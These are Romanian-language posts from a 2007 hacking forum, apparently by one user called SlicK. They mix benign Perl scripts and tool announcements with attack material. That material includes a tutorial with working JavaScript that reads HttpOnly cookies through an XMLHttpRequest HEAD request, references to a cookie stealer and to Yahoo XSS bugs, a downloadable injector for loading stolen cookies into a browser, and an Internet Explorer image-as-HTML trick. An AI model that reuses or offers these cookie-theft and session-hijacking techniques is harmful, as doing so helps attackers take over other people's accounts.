SlicK

nu nu e asta cookie stealer'ul iar xss'uri de yahoo au fost postate cateva, trebuie doar sa fi pe faza

Cookie'uri HTTP-only Autor: SlicK Data: 2 Mai 2007 Vulnerabilitatile XSS sunt deseori folosite de catre atacatori pentru a fura cookie-urile utilizatorilor legitimi. Un mod clasic este accesarea variabilei "document.cookie" folosind anumite scripturi javascript. Incepand cu Internet Explorer 6 sp1, Microsoft a implementat o metoda prin care poate fi impiedicat acest tip de atac. Aceasta metoda foloseste parametrul "HttpOnly" la setarea unui cookie in headers astfel: "Set-Cookie: NumeCookie:valoare; expires=Wednesday, 10-Oct-07 23:12:40 GMT; HttpOnly" Cuvantul cheie "HttpOnly" instruieste browserul utilizatorului sa impiedice accesarea cookiului(document.cookie) prin intermediului scripturilor client-side. In continuare voi prezenta o metoda prin care un script javascript poate accesa acel cookie ascuns prin trimiterea de requesturi raw la pagina si citirea headerelor. Codul care urmeaza este un script PHP care arata diferenta dintre cele 2 tipuri de cookie'uri si cum poat fi citite cookie'urile HTTP-only ===================== <?php // setam un cookie normal care poate fi gasit in "document.cookie" header("Set-Cookie: CookieNormal=valoareA; expires=Wednesday, 10-Oct-08 23:12:40 GMT"); // setam un cookie ascuns header("Set-Cookie: CookieAscuns=valoareB; expires=Wednesday, 10-Oct-08 23:12:40 GMT; HttpOnly"); ?> <script language="Javascript" type="text/javascript"> // functia care extrage cookiul ascuns din headere function unHideCookie() { var xhr=new XMLHttpRequest(); // creem obiectul xhr.open("HEAD",document.location,true); // setam un request HEAD catre aceeasi pagina xhr.send(null); //trimitem requestul xhr.onreadystatechange=function() { if(xhr.readyState==4) { if(xhr.status==200) // daca primim raspunsul corect { var hidden=""; var headers=xhr.getAllResponseHeaders().split("\n"); // citim toate hedearele si le stocam pe fiecare in cate un element al variabilei for(i=0;i<headers.length;i++) { var header=headers[i].toLowerCase(); // indexOf este case sensitive if(header.indexOf("httponly")>0) // atunci cand gasim un cookie ascuns { var cookie=headers[i].substring(headers[i].indexOf(" ")+1,headers[i].indexOf(";")+1); // extragem "nume=valoare;" hidden=hidden+cookie+" "; // adaugam cookiul extras } } //folosim cookie'urile stocate in variabila "hidden" alert("Cookie Ascuns: "+hidden); } } } } alert("document.cookie: "+document.cookie); // afisam cookiurile vizibile unHideCookie(); // afisam cookiurile ascunse </script> ===================== Metoda HTTP-only de ascundere a cookiurilor fata de scripturile client-side este utilizata momentan doar de Internet Explorer dar pe viitor va fi implementata si de alte browsere. Copywright 2007 rstzone.net

BAN

Trebuie inlocuit "Przez" ala de la "Ultimul mesaj" cu "Creat de" sau ceva in genul asta.

Nu l-am facut azi. Azi doar l-am terminat

ENCODED sa ma pui si pe mine pe lista de asteptare la semnaturi. Ceva verde cu negru, niste cod(un asm ceva), SlicK si offcourse RST

Curios pentru ca eu am Y!M 8.1.0.209 si MyYahoo Module 8.0.0.1 si-mi merge

Fiecare cu utilitatea ei De exemplu dupa cum ai spus si tu daca vrei sa vezi daca individul e on/of "msg:" e perfecta dar intr-o aplicatie "opi" e clar avantajata

1. E facut in C (win32 API) 2. Foloseste o baza de date locala (rstil.db)

Mai e si asta http://opi.yahoo.com/online?m=t&u=[iD] sau http://opi.yahoo.com/online?m=g&t=0&u=[iD] (t=0,1,2)

Vreo 2 nopti albe Download: http://rootb0x.com/rstil.rar Printscreens IP locator: Geo Ip database:

dap thanks fluffy

Simplu dar eficient Download: http://rootb0x.net/rstps.rar Printscreen: ======================================= RST Ip Locator Download: http://rootb0x.net/rstil.rar Printscreens IP locator: Geo Ip database: ======================================= RST Notifier Un mic tool care te anunta atunci cand apare un nou post pe forum... Download: http://rstcenter.com/tools/rstn.exe

Codul pentru cautarea numarului lipsa: #!/usr/bin/perl open(FP,"< asta.txt"); @file=<FP>; close(FP); $line=$file[0]; @spl=split(/ /,$line); for($i=0;$i<@spl;$i++) { $is=0; for($j=0;$j<@spl;$j++) { if($spl[$j]==$i) { $is=1; last; } } if($is==0) { print("$i\n"); } } Codul meu secret: UnkeM (pentru numele SlicK)

Am vazut, dar postul e facut inainte de "h0t newz"

Ca sa nu ma mai chinui cu cookie editorul din firefox(imi tot crash`uia) mi-am facut singur un injector Copy/Paste la cookie`ul din stealer(dar fiecare valoare pe alt rand). In rest "read the About" Enjoy... http://rootb0x.com/fci.rar Printscreen:

Domnu admin ai dat cumva ban la ip-urile de AOL sau CS pt ca de vreo 2 zile cand intru cu AOL imi da o eroare 403(Forbidden) in schimb cu socks imi merge fara probleme...

Am vazut chestia asta la TV. 2 tipi stau fata in fata la o masa pe care se afla o bila metalica conectata la un sistem de magneti. Cel care ramane mai calm impinge bila spre celalalt si cand o deplaseaza pe o anumita distanda castiga. E interesanta chestia.. te face sa te gandesti ca pe viitor o sa avem o mufa jack la ceafa si nu ne mai trebuie nici tastatura nici mouse, bagam mufa in calc si gata

Tot ai da banii pe net mai scump pentru ca oricum viteza de transfer este limitata la conexiunea ta. Degeaba downloadezi cu SET de pe 5 servere cu fibra optica conectate direct la backbone-uri daca tu ai 56k pe dial-up, tot cu pana la 8KB ai transfer

Laptop DELL CPU Intel Core 2 Duo T2400 @2.33 GHz 1024 MB RAM 256 MB Video(Intel 945GM) 50 GB HDD

Primeste un playlist de winamp care sa contina mp3'uri(cu altceva nu am incercat) Testat cu Active Perl 5.8.7.815 si Winamp 2.95 dar probabil merge cu orice perl si orice winamp Trebuiesc setate "$PORT","$LIST" si "$NAME" Versiune formatata: http://rootb0x.com/0X0/rad-0.1.txt #!/usr/bin/perl use IO::Socket; $SIG{CHLD}=sub {wait ()}; $PORT=8000; $LIST="playlist.m3u"; $NAME="<<My tiny online radio station>>"; open(PLAYLIST,$LIST) || die("Error: Could not open $LIST\r\n"); @songs=<PLAYLIST>; close PLAYLIST; $server=IO::Socket::INET->new(Proto =>'tcp', LocalPort=>$PORT, Listen =>SOMAXCONN, Reuse =>1); if($server) { while(1) { while($client=$server->accept()) { $client->autoflush(1); if(!fork()) { foreach $song (@songs) { chomp($song); if(index($song,'#')==-1) { print("playing song: $song\n"); print $client "ICY 200 OK\r\n"; print $client "Content-Type: audio/x-mp3stream\r\n"; print $client "Cache-Control: no-cache\r\n"; print $client "Pragma: no-cache\r\n"; print $client "Connection: close\r\n"; print $client "icy-name: $NAME\r\n"; print $client "icy-metadata: 0\r\n\r\n"; open (SONG,"$song"); binmode(SONG); $read_status =1; $print_status=1; $chunk; while($read_status && $print_status) { $read_status=read(SONG,$chunk,1024); if(defined $chunk && defined $read_status) { $print_status=print $client $chunk; } undef $chunk; } close SONG; } } exit(0); } close($client); } } } Am uitat... Winamp->ADD->ADD URL->"IP:PORT"

Buna intrebare

Am reusit in sfarsit cu ajutorul lui amprenta(thanks man)

Inteligent. Daca stii firul logic totul pare extrem de simplu dar fata in fata cu problema se incinge creierul Oricum felicitari...

Functioneaza numai pe IE(inclusiv 7) deoarece nu verifica extensia unui fisier atunci cand este incarcat in browser considerandu-l HTML. Smecheria cu imaginea merge cam oriunde poti posta un link Eu am incercat cu PNG nu cu GIF dar presupun ca e acelasi lucru ...